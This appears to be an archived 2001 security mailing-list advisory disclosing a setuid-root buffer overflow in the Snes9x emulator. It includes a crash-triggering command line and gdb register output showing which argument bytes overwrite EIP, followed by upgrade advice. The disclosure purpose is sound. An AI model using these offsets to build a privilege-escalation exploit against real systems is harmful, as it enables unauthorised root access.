[ Snes9x buffer overflow vulnerability ]

From: Niels Heinen (zilli0nat_private)
Date: Tue Oct 16 2001 - 07:37:34 PDT

Next message: Matthew Firth: "Re: Novell Groupwise arbitrary file retrieval vulnerability"

Previous message: Linux Mandrake Security Team: "MDKSA-2001:080 - Zope update"
Next in thread: Roman Drahtmueller: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Roman Drahtmueller: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Scott Dier: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Mike Hoskins: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[ ** Snes9x buffer overflow vulnerability ** ]

Affected version: v1.37 prior versions might also be affected. 
Tested platforms: FreeBSD, NetBSD, OpenBSD and Linux.  

A buffer overflow vulnerability exists in the snes9x emulator. The
problem is that rom names given as an argument upon execution of
the program are not processed correctly and can be used to trigger
a buffer overflow.

On many systems the snes9x has been installed setuid root (also 
recommended by the developers in the readme. This so it can access 
/dev/mem which is required to run the program in full screen mode. 
The setuid root bit gives the program the ability to perform actions 
with the privileges of root with other words: exploiting this issue
can lead to root access.

[ ** Exploit information ** ]

Exploitation of this vulnerability is a bit tricky but defenitly 
possible:  
 
You need a buffer of 4089 characters to own the EIP this buffer has
to be contructed in a special way:

bash-2.05$ ./snes9x `perl -e 'print "A" x 85;print "B" x 4004;'`
Rate: 22050, Buffer size: 2048, 16-bit: yes, Stereo: yes, Encoded: no
Segmentation fault (core dumped)
bash-2.05$ gdb -core=snes9x.core 
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `snes9x'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424141 in ?? ()
(gdb) info all
eax            0x0      0
ecx            0x282e3401       674116609
edx            0x1      1
ebx            0xbfbfab7c       -1077957764
esp            0xbfbfab4c       0xbfbfab4c
ebp            0xbfbfab7a       0xbfbfab7a
esi            0xbfbfcb7c       -1077949572
edi            0xbfbfbb7c       -1077953668
eip            0x42424141       0x42424141 ( == BBAA)
eflags         0x10282  66178
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) 

As you can see the bytes 83 - 87 of our buffer overwrite the EIP. We (Hobbes
and I) succesfully exploited this vulnerability on FreeBSD and Linux. Feel
free to mail for more information! 

[ ** Fix information ** ]

Upgrade your snes9x package to the latest version if you want to use
it setuid root: http://www.snes9x.com

Cheers,

zillion

Greets to Hobbes, all @ safemode.org and @ #hacker_help (!shit ;)

-- 
Sent through GMX FreeMail - http://www.gmx.net

Next message: Matthew Firth: "Re: Novell Groupwise arbitrary file retrieval vulnerability"
Previous message: Linux Mandrake Security Team: "MDKSA-2001:080 - Zope update"
Next in thread: Roman Drahtmueller: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Roman Drahtmueller: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Scott Dier: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Reply: Mike Hoskins: "Re: [ ** Snes9x buffer overflow vulnerability ** ]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 16 2001 - 08:57:57 PDT